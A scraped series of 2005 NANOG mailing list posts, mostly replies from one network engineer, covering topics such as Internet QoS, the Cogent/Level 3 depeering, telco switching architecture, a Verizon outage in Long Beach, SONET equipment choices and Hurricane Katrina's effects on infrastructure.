Hey there Fergie: Martin, You can 'see' anything you'd like, buy your reality does not match everyone else's -- my opinion, of course. QoS is a myth -- it doesn't exist. What you're obviosuly trying to tell us is that less-than-best- effort is somehow good? Never sell it. This vein will come back and bite you guys who think like this. I'm not sggesting that this be the way the Internet operate at all. The poster asked how this would work if it did (my interpretation) and where there is will (customers) and money (ISP's) there is always a way. The old school in me says never!, but the experience in me says possible. I think it *is* unlikely though. Consider the busy signal approach for a second though. Can we build, pay for, and sustain an Internet that never has congestion or is never busy. If you have a web server and a limited amount of memory or net you tune down the number of httpd's that are spawned and when they are all busy, your site doesn't answer and you get a 404. That's akin to a busy signal and is already in practice today. If I'm Google, for example, I buy thousands of servers so this does not happen. If I'm just plain old me and I am running some popular faq on my personal site, I accept the 404's because I am not going to pay for 100% performance. They can try again later, or, I can pay for more memory or more network to insure optimal performance. Hope that makes a little more sense. And let me turn the question around to you. If the Internet were to work like this, how would we do it? - ferg -- Hannigan, Martin [EMAIL PROTECTED] wrote: What I'm interested in is how the two service providers will build a two tiered Internet. The PSTN is tiered both in architecture and operation. Switching hiearchies and a seperate SS7 network which is basically a billing network. I think the thought is service levels vs. congestion control. For example, CO's have call overflow mechanisms to tandem switch points which basically seek out excess capacity and use it as overflow for call termination if and when possible. I could see an internet hiearchy where preferred traffic was switch onto hicap overflow links with controlled congestion and other traffic, non premium traffic, got a fast busy. -M -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet [EMAIL PROTECTED] or [EMAIL PROTECTED] ferg's tech blog: http://fergdawg.blogspot.com/
RE: Let's talk about ICANN
I'm surprised that I've yet to see any mention here on NANOG about the Internet Governance Forum discussions that were held at the WSIS / United Nations summit in Tunisia a few weeks ago. From my reading of the various articles, it appears that the EU together with some developing nations wanted to wrest control of the Internet away from the US and ICANN. Was everyone unaware of this, or were you just counting on Vint Cerf to talk sense into the delegates from the other countries? http://news.com.com/U.N.+says+its+plans+are+misunderstood/200 8-1028_3-5959117.html Then there was ICANN's sudden delay of discussion/approval of .xxx: http://news.google.com/news?q=icann+xxx followed by their approval of .asia: http://news.google.com/news?q=icann+asia Is anyone here paying any attention to any of this? jc I'm on the 2006-2009 NRO Address Supporting Organization Advisory Council (www.nro.com) (www.aso.icann.org) and was at the Vancouver meeting. There were quite a few people from the NANOG community at the ICANN meeting in Vancouver. I would think that ICANN is off topic for NANOG? -M
RE: Someone from nic.net registrar please contact me off-list
Thanks Evaldo Gardenali You know, if people are going to post here as a paging service, it would be nice to put some indication as to why - perhaps the rest of us can assist more quickly? 9 times out of 10 we can since it's usually operator/user error and not necessarily the providers issue. At least that's my experience with $doofus to the white lobby phone. YMMV. -M
RE: paypal down!
On Tue, 15 Nov 2005, Steven Kalcevich wrote: www.paypal.com Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [EMAIL PROTECTED] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Works for me. Same BS splash advertising that always comes up. Damn that is annoying. Yes, but it *is* up. Same here. Probably one of the rotation web servers had an issue or something minor. -M
RE: STILL Paging Google...
Still no word from google, or indication that there's anything wrong with the robots.txt. Google's estimated hit count is going slightly up, instead of way down. Why am I bugging NANOG with this? Well, I'm sure if Googlebot keeps ignoring my robots.txt file, thereby hammering the server and facilitating s pam, they're doing the same with a google other sites. (Well, ok, not a google, but you get my point.) Why would they read/respond on NANOG to an application problem? (seriously) -M
RE: paypal down!
On Nov 15, 2005, at 9:45 PM, Hannigan, Martin wrote: www.paypal.com Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [EMAIL PROTECTED] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Works for me. Same BS splash advertising that always comes up. Damn that is annoying. Yes, but it *is* up. Same here. Probably one of the rotation web servers had an issue or something minor. Or there's a chance that you've got a trojan/malware install on the computer. No chance. Do you have the attributions wrong here? Even your own website says that 404's are 70% burp-factor - which I would tend to agree with for the most part. Not enough httpd spurned, reloads, bad pages, etc. http://www.404lab.com/404/yikes.asp And oddly enough, no mention of the possibility of malware. Time to update. :-) -M
RE: paypal down!
Or there's a chance that you've got a trojan/malware install on the computer. Slight correction to my earlier post - just to be clear. Not just 404's, failed pages in general. My failure scenarios were wider than 404. -M
RE: Networking Pearl Harbor in the Making
On Mon, Nov 07, 2005 at 06:43:35AM -0500, J. Oquendo wrote: the center of the information security vortex. Because IOS controls the routers that underpin most business networks as well as the Internet, I think in general this is an argument against converged networks, the added complexity and outages may not be worth the gains.. Convergence isn't going away because Networld Week thinks routers are insecure (no, really?). It's an argument for vendor diversity. -M
RE: Networking Pearl Harbor in the Making
On Monday 07 Nov 2005 3:42 pm, Hannigan, Martin wrote: It's an argument for vendor diversity. No it is an argument for code base diversity (or better software engineering). Vendor diversity doesn't necessarily give you this, and you can get this with one vendor. How so? Haven't we recently seen an across the board bug in multiple version of $vendor code? Vendor diversity might be a good idea, but for other reasons. Sure. There are more reasons than one to do it. I was specifically pointing out that code diversity is a good one - and not forgetting associated cost and economic impacts as mentioned in a later followup. -M
RE: Using BGP to force inbound and outbound routing through particular routes
What's the netblock and ASN you already have? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Edward W. Ray Sent: Wednesday, November 02, 2005 2:50 PM To: nanog@merit.edu Subject: Using BGP to force inbound and outbound routing through particular routes spam was a lousy name... -Original Message- From: spam [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 02, 2005 11:44 AM To: 'nanog@merit.edu' Subject: FW: Using BGP to force inbound and outbound routing through particular routes I recently made a request to get a cable modem connection at my home. I went for one of those $29.95 for three month specials in case I run afoul of some rules prohibiting what I am going to do. I already have a multi-T1 connection with a Class C block and BGP running on my Cisco 3640 router, and was looking to become multi-homed. The cable connection is via bridge/DHCP cable modem, and was going to hook it up to the Cisco 3640. I have already done the research and know from what block of IP addresses I will be assigned, and the BGP route tables/peers. I would like to use BGP to force inbound and outbound routing only through particular peers, Sprint (AS 1239) and UUNET (AS 701). I have been reading Practical BGP by Whate, McPherson and Sangli and this appears to be possible. However, do my adjacent routers need to support BGP in order for this to work? Could I use other routing protocols to accomplish this, or would this require knowledge of all possible downstream router IP addresses? Edward W. Ray
RE: IPv6 news
No. Within a region. Normally area codes are a region. Sometimes entire country codes are a region in this sense. Depends on the size of the region/country though. In some cases there is even more than one area code for the same region. LATA's are geographic areas and NPX(prefix) are switching areas within the LATA(Local Access and Transport Area). The geo regions(LATA) are set up to differentiate local and long distance inside the US. There's a three level hiearchy within each LATA, and there are three levels in the United States as defined by the regulators, post divestiture. I'd have to say your definition may be accurate outside the US, but not inside. [ SNIP ] The telco peering points is just a technicality. It's there just for optimization. Most regulators have set up an easy interconnection policy to prevent your favorite incumbant from offering 'peering' only on lands end. They're more than a technicality. They are required by the regulator. There are commodity markets related to IXC minutes exchange as well. This helps to keep LD cheap (as it can be) and reliable as if one carrier is unable to carry minutes, others can. The basic telco archictecture in the USA is EO, TO, and AT. In the case of LD, it's EO, TO, to a POP, and IXC. EO, TO and AT are all interconnected some symetrically, some asymetrically, with the exception of the IXC which is all symetric. Personally, this is a very interesting thread to me, but I think this is starting to go way off topic for NANOG. -M
RE: Verizon outage in Southern California?
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Tuesday, October 18, 2005 3:13 PM Telephone service is beginning to be restored in the Long Beach area but is still sporadic. Our ATM WAN link through Sprint came back up around 1345 Central time, and the two DS1s for the school's Internet service were revived about fifteen minutes ago (1507 CDT). They've been rock-solid so something must be going right out there. When I called Sprint about any information they might have for the outage the tech said that the area was down due to a Verizon DACS failure. That must have been a spectacular failure, because I'm reading that it wiped out most everything ( http://www2.presstelegram.com/news/ci_3128087 indicates four tandems hit?! ) in the area. The articles are primarily focusing on the impact to E911 services, followed with the hit to POTS lines. I have yet to see any mention of impact to data in any of 'em. Here's what intrigues me about this outage: if it wiped out E911, most of the POTS and also impacted data services (as Jay Hannigan and I can attest), how did the cell towers that are also served by the network live through it? The dependancy between all of those would be a DACS so that seems to make sense. I'm guessing the impacted circuits were DS3 or below, with Verizon providing resale of the Z ends. I'm not sure of the relation to E911 though. Could be, but it sounds odd since E911 has redundancies to tandems IIRC. My guess is water on a DACS bay or complete power loss in the CO (rarer than water on a DACS). -M
FW: Verizon outage in Southern California?
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Matthew Black Sent: Tuesday, October 18, 2005 3:13 PM I'm not completely familiar with the telco jargon. Does Tandem mean the same as a local central office, where POTS lines terminate at the switch? Long Beach has a population of 470,000. The C/Os I know of are: A tandem office is a CO primarily used as an aggregated switch point between local CO's. Think interconnection of local CO's or long haul tandems. Alamitos at 7th Street and Termino, ZIP 90814 Clark near Clark Ave and Pacific Coast Highway, ZIP 90804 LongBeach at 6th Street and Elm Ave, ZIP 90802 Lakewood at Clark Ave and Connant St, ZIP 90808 LNBHCAXG at 3440 California Ave, ZIP 90807 (for my home) That's the building CLLI, the switch is LNBCHAXGDS0. This one is a 5ESS and serves 12 exchanges. 562-290 562-424 562-426 562-427 562-490 562-492 562-595 562-933 562-981 562-988 562-989 562-997 I see 7 5ESS and 1 Nortel SLC DMS 10, possibly a remote to a campus or something, in Long Beach. 507 E LEW is holding the most switching gear is likely a tandem. Um, I think this is the tandem code, PNTCMIMN50T, and it's servicing about 20 areas. I have no idea whether cell service was truly affected. The announcements we sent to our campus suggested people use their cell phones for 911 service which would be serviced by the CA Highway Patrol (Erik Estrada, etc.) or a campus telephone which is serviced by our local campus police (sworn state police). I was completely unaware of the outage until someone else mentioned it in my office. If you know of an NPA-NXX of a cell phone that was impacted, send it privately and I'll tell you what CO it terminates in.
RE: SONET MUX
Hello, We are looking for a OC3 - 3xDS3 MUX. (If it can grow up to a OC12 - 12xDS3 thats a plus) Sonet side will be 1+1 protected I have looked at the following equipment is there any other sonet muxes that i should look at? Adtran Opti-3 Adtran OPTI-6100 Cisco ONS 15310, 15327 Fujitsu Flashwave 4010, 4100, 4300 Fujitsu FLM 150 The difference between Fuji and Cisco is the backplane architecture. The former is redundant and is a five nines solution. The latter is not and is a four nines solution. You will find the cisco device cheaper to buy and operate. The cisco is also less RU and less power. If you haven't already lighted your own dark fiber network, there's a lot to know at layer 1 to be sure you get the redundancy you're looking for in layer 3. Have you considered leasing circuits from a LEC or buying a wavelength managed service? -M
RE: Operational impact of depeering
-- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Tom Vest Sent: Monday, October 10, 2005 9:46 AM To: Nanog Mailing list Cc: [EMAIL PROTECTED] Subject: Re: Operational impact of depeering On Oct 10, 2005, at 9:28 AM, [EMAIL PROTECTED] wrote: It would be great if we could shift focus and think about the operations impact of depeering vs. just the political and/or contractual ramifications. Have there been any proposals put forth to the NANOG PC to review this highly visible depeering at the NANOG meeting this month? Aside from anything else, there is this interesting topic on the agenda: Abstract: NetFlow-based Traffic Analysis Techniques for Peering Networks Richard Steenbergen, nLayer Communications, and Nathan Patrick, Sonic.net Seems to me that a discussion of traffic analysis could handle a slide or two on actual impacts of this depeering. --Michael Dillon Here's one way of looking at it: (copied below b/c the list is not publicly archived) TV From: Tom Vest [EMAIL PROTECTED] Date: October 8, 2005 6:00:32 PM EDT To: Telecom Regulation the Internet CYBERTELECOM- [EMAIL PROTECTED] Subject: Re: [CYBERTEL] [ misc fyi ] internet peering breaking down (fwd) Okay now that the flap is over and I have a few minutes to spare, I'll bite. On Oct 6, 2005, at 10:34 AM, Peter R. wrote: Your passionate response deserves a response: It's not very small indeed. Compared to what? On 10/1/05, Cogent's network (AS174 -- a very old network) originated the equivalent of 1x /8 + 1x /9 -- that's 1.67% of the ends that constitute the global end-to-end network that we call the Internet. Same day/time, Level3's network (AS3356) originated the equivalent 2x /8 + 1x /9 -- or total Internet production 3.05% at that point in time. Note: numbers are derived from the Route Views archive: http://archive.routeviews.org/oix-route-views/2005.10/oix-full- snapshot-2005-10-01-.dat.bz2. In an RFC 1930/2270 compliant world, 99% of networks downstream of either disputant have other, unaffected upstreams, so presumably they don't lose reachability to anyone. Maybe there are 1b Internet users worldwide, and maybe they are distributed roughly in proportion to the distribution of Internet production. So maybe 5% of the world population as affected by the dispute -- roughly 5m users. Anti-Level(3)? The only fact in this was the route view count, and even that could be wrong. Not a very fair comparison, especially to make to regulatory people who may not know better. AS 174 was old when it was PSI. It's now Cogents ASN via acquisition. You fairly imply that Cogent is as old as PSI in garnering sympathy for them being old school. Cogent is not old school. -M
RE: Cogent move without renumbering
Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? Depending upon the circumstance, yes: http://www.cctec.com/maillists/nanog/current/msg01880.html
RE: Cogent move without renumbering
On Fri, 7 Oct 2005, Hannigan, Martin wrote: Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? Depending upon the circumstance, yes: http://www.cctec.com/maillists/nanog/current/msg01880.html I think that is not entirely correct comparison. Original poster did not not say that the current L3 customers would entirely leave L3, but that he asked if they could do something to get other type of connectivity if they have L3 ip space. The answer is that if they have /24 or longer and have router then they can turn on BGP and announce that /24 both to L3 and to another ISP and in this way have full connectivity. This would not be an attempt to take ip ip space away from L3. But this is not something they could do within couple days if they do not run BGP and do not have ASN (takes at least a week to get it from ARIN). For a minute there, I thought you might be right since I'm browsing for clue factor and may have missed something, but, it appears you are inaccurate in this as the poster did say: --QUOTE If a single-homed network moves from L3 to Cogent, how would they benefit? Would they not still be cut off from a significant percentage of the Internet? Is it reasonable to think that numerous /24's from L3's IP space could be reassigned elsewhere without causing significant trouble for L3 and others? Even if it could work, what would be the justification for taking L3's property? --END QUOTE That quote is asking if someone can take Level(3)'s PA space assigned with them to another providers network. The answer is yes, it's possible. IANAL
RE: Cogent move without renumbering
[EMAIL PROTECTED] (Charles Cala) wrote: Q can an end user take non portable ip's with them to another service provider? What in non portable did you not understand? Elmar. Court orders from United States Courts to United States business regarding IP addresses issued by United States RIR's? -M
RE: Cogent/Level 3 depeering
Now Cogent is also offering free transit for single-homed L3 customers to spite L3 after depeering - majority of such single-homed transit customers are in fact these dsl/dialup ISPs Cogent is after which is why they were willing to make this offer ... Didn't the free peering offer happen _yesterday_ as a result of the disengagement? It's a tactic. Tommorrow, Level(3) could come out with the same. It's not sustainable by either. Nothing is free. We all know this. Now with 0 transit cost and 0 equipment cost (mostly old dialup equipment loans for which have by now been paid for) You mean amortization? Yes, it's about that. They deployed most of the dial gear in 98, 99. I'm sure augmentations happened after that. Anyhow. What you don't understand is the architecture sans TDM switching, ala SS7 bypass. That's what makes the $5 nut a reality. its no wonder dialup providers are able to offer it at $5/mo if somebody else takes care of the customer support billing ... That's what the other $1 to $10 dollars the retailers are charging is for, William. -M
RE: Cogent/Level 3 depeering
Just curious - Has this activity impacted voice services for anyone, and/or has either opened a FCC NORS report? Why could you open a NORS unless it's impacting LD and meet-me minutes? :-) -M
RE: Cogent/Level 3 depeering
At 10:46 PM 10/5/2005, you wrote: ok, vijay popping up is not totally surprising, but twice? dorian was a bit of a surprise. but you, joe? coming out of the woodwork? the lack of clue in this thread must be *really* painful. It's pretty evident that this has been a clue-free thread... Welcome to the thread. -M
RE: Cogent/Level 3 depeering
= The dialup case results in a very large number of users of a large number of ISPs being single-homed to one or the other of these outfits. Keep that in mind too when you next sign a contract for wholesale dialup service. Dialup costs are $5 a month or less wholesale. What do you expect? -M
RE: Cogent/Level 3 depeering
You say that as if the only move to be made is on Cogent's side. What about L3? If every L3 customer complained to L3, demanded service credits, claimed the contract was in default, and swore to never buy from L3 again, maybe L3 would budge instead. How is this relevant again? What IX's do you peer at? -M
RE: Turkey has switched Root-Servers
do you still think that Paul Vixie has given very good arguments?, peter? Merchandising, merchandising, where the real money from the movie is made. Spaceballs the T-shirt. Spaceballs the lunchbox. Spaceballs the coloring book. Spaceballs... the flamethrower! Kids love it. And my favorite, Spaceballs the Doll -- me! -M
RE: Anyone seen 172.15/16 lately?
But that doesn't answer the question: (;)) NetRange: 172.16.0.0 - 172.31.255.255 CIDR: 172.16.0.0/12 NetName:IANA-BBLK-RESERVED That's the reserved range, he's looking for the /16 before that. Isn't 172.15/16 legacy Sun example space pre 1918? It's all over CCO and Sunsolve in examples and defaults. -M
RE: [fergie-spew] RE: FW: Crews Survey Rita's Damages
[ SNIP ] The issue you decided to comment on was a one-line rider about the excessive heat in cetral Texas today. I trimmed the post down to the bottom. There's nothing to read into. While the latter may have well been off-topic I don't disagree that a run of the mill news story is on topic. It's the large off topic threads that historically have followed your blog and news posts. Windows filters aren't the most reliable beyond a simple tag to home in on. Thanks for the tag. My windows machine and I appreciate it! -M
RE: [afnog] ARIN to allocate from 74/8 75/8
Hi, NANOGers. ] due to filtering issues at the hosting provider of the cymru ] pingable, the data plane story is not as sanguine. i am told ] it will not be fixed until the weekend. That's not quite correct. :) One of our transit providers had some outdated filters We all have change management windows. This type of work would progress via these processes that we each have. In many cases, there are more than one CM process something like this would have to traverse. [EMAIL PROTECTED] said: ARIN will begin allocating IP address space from 74.0.0.0 /8 and 75.0.0.0 /8 within the next 2 weeks. ARIN was issued 74 /8, 75 /8, and 76 /8 by the IANA on June 17, 2005. If this isn't just a pingable address with the resolutions left to all of us, this is not enough time for testing. -M
RE: [afnog] ARIN to allocate from 74/8 75/8
i.e. is there a pingable address in each, as has been discussed here just a few times? ping is ok, but routing table entry existence seems better. ping can fail for lots of reasons and what we're really testing is routing, not icmp end-to-end, right? There's a difference between reachability and routability. The lack of a routing table entry indicates a different problem which implicates routing and reachability problems. I don't agree that reachability is implied with routability. if it's useful, i'd be happy to report what percentage of my peers have/don't have routes to these prefixes. I'd be interested. Best, -M
RE: Don't Cache that check
Somewhere, there's a shepard listening for your cries of Wolf... -doug Shouldn't a provider know their cache servers are STORING copyrights. You demonstrate why companies need lawyers. And why this list isn't called The Lawyers Operator Group. Did Vint mark you yet? -M
RE: Calling all NANOG'ers - idea for national hardware price quote registry
If need be I'll off shore it. Matt Fine, you can build it and off-shore it, but I suspect that is a case of if you build it they will not come. Robbing points from each other at the deal desk has 0 value to all of us. It also has 0 operational value. Ultimately, the smaller guys would suffer as a result anyhow. The more points beaten down at the top, the more pressure to not discount at the higher margins. [end] -M I think that people have made it fairly clear that this is a bad idea, but I don't think that anyone is going to stop you building it. I am guessing that you will 1) get inflated prices because the people who are getting the really good discounts are going to be the ones with the most to lose personally and 2) lots of happy shiny letters from vendor's lawyers asking you for logs. Whether or not you have logs is largely irrelevant, you will still get the letters. I don't know about you, but I have better things to do than a: unnecessarily antagonize the same people that you presumable want to get a good discount from and b: collect subpoenas. Warren. -- Build a man a fire, and he'll be warm for a day. Set a man on fire, and he'll be warm for the rest of his life. -- Terry Pratchett
RE: Computer systems blamed for feeble hurricane response?
http://www.fema.gov/staff/extended.jsp Lists an IT Services Division that has ~250 possible points of contact. Surely one of them has some clue... :-/ I think this sort of problem shows the endemic disease currently in place at FEMA. It's not just an IT gaffe or firewall mistake. It's a failure much more serious, sadly. ObOp: Email is NOT a reliable form of communication. DHS shouldn't start to think so either. NANOG shouldn't worry about if someones email is working as a byproduct, but sure worry if the store and forward function of an ISP is. ' Anything below that is the individual SP's problem, IMO. Perhaps there are reasons some corporate or volunteer mail service is not working i.e. blocked, disallowed on port, etc. ObNotOp: Anyone who needs to contact FEMA, already knows how. If they are using a web page address, they probably shouldn't be contacting FEMA directly, but working through their own government hierarchy.
RE: CAT5 surge/lightning strike protection recommendations?
Anyone have recommendations (tested/practical is best :-)? The APC Protectnet PNET1 and PRM24 seem quite nice and not too expensive -- if they workpros? cons? It sounds like you're either out of NEC, or, you are grounding them to waterpipe. I believe NEC calls for grounding via earth. You could strike some rod into the ground several feet deep, attach to the pipe with conductive screw+locknut+washer, and a proper gauge for distance cable. Theoretically, that should solve your problem. What did you electricians say? -M
RE: mail service with no mx (was - Re: Computer systems blamed for feeble hurricane response?)
Application layer firewalls have existed for at least 6 years. Make that 15 Socks, fwtk (before it went commercial) to name a few. -M
RE: www.usenetabuse.com?
Title: RE: www.usenetabuse.com? I haven't run a large usenet server in awhile, but, anyone asking for your phone number related to a usenet complaint has a whole lot of time on their hands. Wait for Supernews to chime in. Martin -Original Message- From: Howard C. Berkowitz [mailto:[EMAIL PROTECTED]] Sent: Sat Sep 10 21:51:47 2005 To: nanog@merit.edu Subject: www.usenetabuse.com? I'm assisting in trying to deal with a group of flooders/trolls. One remailer directs complaints to www.usenetabuse.com. Does anyone know if this is a legitimate anonymizer abuse desk, or phishing for details of exploits?
RE: UNITED.COM (United Airlines) has been down for days! Any info on this?
United.COM works from everywhere I try it. MCI, ATT, Internap, and Sprint. I can run tickets, check miles, and check my dining points. Since I started the thread a month ago... it seemed to me that the problem(s) are intermittent and not always repeatable :( I was able to see some very odd things in the dns resolution area for their site(s), which others had confirmed being problematic over the last few months as well. You started this? Thanks. I love IKYABWAI threads. :-) I'd think that lastnight's 'problem' was just another recurrence of the same set of problems :( Maybe someone at Internap could tell them/ask them what's going on?
RE: FW: Need some help: IDEAS, Inc.
this is NOT a good solution, since a successful phish attack in this case would look exactly like the official red cross web site. How's that one work? -M
RE: UNITED.COM (United Airlines) has been down for days! Any info on this?
Nice try, but the location that I was trying from did not use alternative root servers. FYI: They are Inclusive Namespace Servers. United.COM works from everywhere I try it. MCI, ATT, Internap, and Sprint. I can run tickets, check miles, and check my dining points. Currently linked via United News: The aftermath of Hurricane Katrina is still causing cancellations and some flight irregularities. Check the status of your flight before traveling and read on for information about changing travel plans affected by the weather. We are attempting to recover to full operations as quickly as possible. Sounds like a local issue. -M
RE: FW: Need some help: IDEAS, Inc.
this is NOT a good solution, since a successful phish attack in this case would look exactly like the official red cross web site. How's that one work? One form of DirectNIC's redirection, which the phisher was supposedly using (I didn't check myself), uses a FRAMESET to hide the redirect inside a frame, thereby not showing the real address in the browser without deeper inspection. Understood. If it's being pointed at redcross.org, a known good guy site, that wouldn't be a problem, would it? It seems that if the scammer is removed from the operation, it's not really a problem anymore. I'm interested because I think there could be value in a page(s) on an SP that says This site terminated due to fraudulent activity and pointers to how to not be sucked into these things. Personally, I'd prefer registrar lock myself, as that keeps the distinction between scam and non-scam clear. Registrar lock is preferred on my part. The redirect idea was creative. -M
RE: Tidbit from DirectNIC
Title: RE: Tidbit from DirectNIC If you need a raft as a supply in a datcenter there's obviously a bigger issue at hand and its unlikely you'll have many of us as customers. What have you done to help the situation in New Orleans? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Fri Sep 02 11:45:39 2005 To: nanog@merit.edu Subject: Tidbit from DirectNIC >From downtown New Orleans... http://www.livejournal.com/users/interdictor/ -snip- Fox News is reporting that there is an operation underway to refill chillers at the Bell South building down the street to keep phone service available to much of the southeast United States. That is apparently where all the firetrucks are going to in the area, in case you were wondering. -snip- It is interesting to note that it is possible to bring in diesel and water to resupply BellSouth yet it is impossible to bring in water and food for the residents, not to mention a fleet of small boats that could have prevented thousands from dying trapped inside their attics. If you have a datacenter in a location that might be flooded by rivers or storm surges, do you have inflatable rafts among your emergency supplies? --Michael Dillon
RE: trying to move web site for New Orleans schools
Outside the NANOG charter, but given the current circumstances, this seemed to be a reasonable forum for suggestions on solving this problem. I suggest everyone move with caution on making any unauthenticated changes on the fly for anyone claiming to be impacted by the storm. I know we all feel badly, but this is a good opportunity for miscreants, phishers, and scammers to wreak havoc. -M
RE: Bell South or Telcove help needed in NOLA
If anyone who works for or has connections with Bell South or Telcove is reading this, tell us what it's going to take to get those OC3s back up and running. We will try to coordinate and make it happen. If I were DirectNIC, I'd be making arrangements to operate from a place other than New Orleans for the time being. -M
RE: redcross.org certificate problems with Akamai
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Jay R. Ashworth Sent: Thursday, September 01, 2005 3:12 PM To: nanog@merit.edu Subject: Ops: redcross.org certificate problems with Akamai The donations page is Akamaized, and the certificate says a248.e.akamai.net instead of www.redcross.org. I have the certificate signature available off-line. Which part of the transaction does this occur at? Do you have a specific URL? All of the VeriSign security seals are reporting known and trusted host and the certs are matching. They appear to be outsourcing their payment processing to Convio. It's all matching up. -M
RE: August 2005: Drone Army Botnet CC listing
30058 FDCSERVERS - FDCservers.net LL 123 43 21840 SAGONET-TPA - Sago Networks 53 26 Much better. And no IL-CERT. :-) Is it safe to say the resolutions, at least in these two cases, are because of others mitigation activities i.e. snatching back the RR's, shutting off the domain, black holes, etc? -M
Martial Law declared in New Orleans Was: RE: Katrina could inundate New Orleans
Breaking news..Apparently a 200 foot section of levee broke last night and is gradually burying the city. Martial Law has been declared in the area as well. Overnight Levee Break: http://www.theadvertiser.com/apps/pbcs.dll/article?AID=/20050830/NEWS05/50830005 Martial Law: http://jurist.law.pitt.edu/paperchase/2005/08/breaking-news-martial-law-declared-in.php -- Martin Hannigan (c) 617-388-2663 VeriSign, Inc. (w) 703-948-7018 Network Engineer IV Operations Infrastructure [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Matthew Kaufman Sent: Monday, August 29, 2005 11:47 AM To: nanog@merit.edu Subject: RE: Katrina could inundate New Orleans Dave Stewart: Y'know... I do have to wonder whether Internet access is nearly as important as power and communications (traditional comms, such as the PTSN). Granted, it'll be interesting to see how things shake out - but I just can't buy that getting the Internet working should/will be a really high priority. Back when I was running ISPs, we had several county and city Emergency Operations Centers as customers... Either on T1 or frame relay for their primary service, or as their backup dial-on-demand ISDN provider. These connections were how the EOC got river gauge data for planning flood evacuations (at the time, no other source other than having the numbers read off from the state-level agency office over the phone if they weren't too busy), USGS earthquake epicenter (also available over EDIS) and shake map (Internet only) data, weather service radar and satellite images (backup was TV broadcasts, if still on the air), and in some counties, the only access to the hospital emergency room status tracking system used for multi-casualty incidents... While there's more private data networks online now, there's also more Internet-available data that the EOCs would like to have access to, I'm sure (I know that some cities are using Internet-connected webcams to do security monitoring, look at shorelines, etc.) In many incident scenarios (and a few actual incidents), the priority was that the radio system stayed up, then Internet access, *then* PSTN (and having cellphone access to people in the field to supplement the radio system was more important than landline calls to anywhere else). And power, of course, is easily generated locally, so not a big priority at all. Interestingly, almost none of the agencies told sales what the connection was going to be used for... Only when engineering made a followup inquiry would we learn that, yes, in an emergency, they'd like theirs fixed first please, and yes, they'd need first dibs on the backup power if we didn't have enough to run everything. Matthew Kaufman [EMAIL PROTECTED]
RE: Arbor's technical support contact?
How can I contact Arbor's technical support enigneer? http://www.arbornetworks.com/products_support.php
RE: Katrina could inundate New Orleans
http://hosted.ap.org/dynamic/stories/K/KATRINA_THE_BIG_ONE_LAO L-?SITE=LABATSECTION=HOMETEMPLATE=DEFAULT Looks like the major hit to occur between 7A/11A Eastern. http://www.weatherstreet.com/CloudsPrecip.htm# -M
RE: Katrina could inundate New Orleans
This post is very OT, but I think events warrant the protocol violation this time. If you're in New Orleans, I'm sure the health of the local internet infrastructure becomes secondary to getting your ass above sea level... Some of this is on topic. Internet access is as important as the lights or water being on. Right, get out, but it'll be good to see reasonable updates on what's going on utilities wise down there when the weather shifts. -M
Re: Blocking certain terrorism/porn sites and DNS
Title: Re: Blocking certain terrorism/porn sites and DNS Since when is Internet email reliable? -Original Message- From: J. Oquendo [mailto:[EMAIL PROTECTED]] Sent: Thu Aug 18 14:38:31 2005 To: [EMAIL PROTECTED] Cc: William Allen Simpson Subject: Re: Blocking certain terrorism/porn sites and DNS On Thu, 18 Aug 2005, William Allen Simpson wrote: Apparently, you did Of course, repeated posting here will vastly improve your opportunity to examine binaries handily delivered directly to your own email box. ;-) handily delivered directly to your own email box. I take note of your own email box. So again I ask, how do you propose dealing with mail that was handily delivered to your clients' email boxes. Or would you just be assuming if test -f LOOKS_LIKE_MY_EMAIL then filter_that. Either way you want to cut your comment it would take a bit of snooping to parse out traffic not destined to your own email box(es). So what do you tell your customer Oh by the way we had to snoop in on your sessions to stop some new and improved MS uberworm. If so, when do you do it, when your network is crawling, after the fact... What if you're off by one and accidentally filter out say a contract worth a lot. Again, if I'm missing something by all means e-smack me. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo GPG Key ID 0x97B43D89 http://pgp.mit.edu:11371/pks/lookup?op=get=0x97B43D89 To conquer the enemy without resorting to war is the most desirable. The highest form of generalship is to conquer the enemy by strategy. - Sun Tzu
RE: drone armies CC report - July/2005
Wall of sheep certainly is humorous, but IL CERT using this data as a shaming mechanism is, well, a shame. Why you associate IL CERT with this is confusing to others. I am confident that you know there is little or no connection. We all have employers. You, me and Gadi included. ;-) I don't know that. I am not part of the project. It was sent from cert.gov.il and had a sig from the manager of the IL CERT. We can go around in circles all day on this, but it seems that the IL CERT was used to give the report credibility so it's fair to give feedback on it as official CERT policy, IMO. nothing actionable Enough said. -M
RE: drone armies CC report - July/2005
[ SNIP ] Below is a periodic public report from the drone armies / botnets research and mitigation mailing list. For this report it should be noted that we base our analysis on the data we have accumulated from various sources. According to our incomplete analysis of information we have Serious question. Is this self promotion of IL CERT? -M
RE: drone armies CC report - July/2005
